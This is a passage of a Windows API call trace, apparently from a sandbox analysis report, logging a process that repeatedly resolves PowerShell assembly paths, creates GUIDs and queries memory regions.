lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.787] GetLastError () returned 0x0 [0026.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.787] GetLastError () returned 0x0 [0026.795] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2f097e3c, Data2=0x1289, Data3=0x4f0a, Data4=([0]=0x93, [1]=0x33, [2]=0x5, [3]=0x29, [4]=0x89, [5]=0x58, [6]=0xb5, [7]=0xc6))) returned 0x0 [0026.795] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xda757b7b, Data2=0x7bd5, Data3=0x4f0e, Data4=([0]=0x93, [1]=0x3c, [2]=0xcb, [3]=0x29, [4]=0x99, [5]=0x3d, [6]=0xfc, [7]=0xab))) returned 0x0 [0026.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.795] GetLastError () returned 0x0 [0026.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.795] GetLastError () returned 0x0 [0026.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.795] GetLastError () returned 0x0 [0026.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.795] GetLastError () returned 0x0 [0026.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.837] GetLastError () returned 0x0 [0026.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.837] GetLastError () returned 0x0 [0026.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.837] GetLastError () returned 0x0 [0026.838] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xee62a966, Data2=0x78d, Data3=0x49e1, Data4=([0]=0x8f, [1]=0x36, [2]=0x91, [3]=0x74, [4]=0xbe, [5]=0x27, [6]=0xbb, [7]=0xcb))) returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.838] GetLastError () returned 0x0 [0026.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.839] GetLastError () returned 0x0 [0026.840] VirtualQuery (in: lpAddress=0x1ccd24, lpBuffer=0x1cdd24, dwLength=0x1c | out: lpBuffer=0x1cdd24*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.842] VirtualQuery (in: lpAddress=0x1ccd60, lpBuffer=0x1cdd60, dwLength=0x1c | out: lpBuffer=0x1cdd60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.842] GetLastError () returned 0x0 [0026.842] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.844] GetLastError () returned 0x0 [0026.844] VirtualQuery (in: lpAddress=0x1cd090, lpBuffer=0x1ce090, dwLength=0x1c | out: lpBuffer=0x1ce090*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.845] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.847] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.850] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.869] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.870] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.871] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.871] VirtualQuery (in: lpAddress=0x1ccecc, lpBuffer=0x1cdecc, dwLength=0x1c | out: lpBuffer=0x1cdecc*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.871] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.872] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.872] VirtualQuery (in: lpAddress=0x1cd028, lpBuffer=0x1ce028, dwLength=0x1c | out: lpBuffer=0x1ce028*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.872] VirtualQuery (in: lpAddress=0x1cd064, lpBuffer=0x1ce064, dwLength=0x1c | out: lpBuffer=0x1ce064*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.873] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x25cd6c81, Data2=0x3866, Data3=0x4af6, Data4=([0]=0xb1, [1]=0x26, [2]=0xba, [3]=0x9a, [4]=0xf5, [5]=0x10, [6]=0xe1, [7]=0x77))) returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdae8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.873] GetLastError () returned 0x0 [0026.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 